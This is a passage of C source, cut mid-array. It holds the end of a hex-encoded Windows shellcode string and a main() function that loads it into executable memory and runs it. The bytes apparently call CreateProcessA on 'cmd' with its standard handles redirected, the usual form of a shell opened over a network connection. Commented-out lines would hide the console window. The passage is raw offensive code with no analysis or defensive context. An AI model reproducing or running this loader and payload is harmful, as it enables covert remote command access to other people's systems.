 "\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
 "\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
 "\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
 "\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
 "\x52\x52\x51\x52\xff\xd5";
 int main(int argc, char** argv)
 {
 	//HWND hWnd = GetConsoleWindow();
 	//ShowWindow(hWnd, SW_HIDE);
 	printf("Shellcode Length:  %d\n", strlen(code));
 	void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	memcpy(exec, code, sizeof(code));
 	((void(*)())exec)();
 	return 0;
 }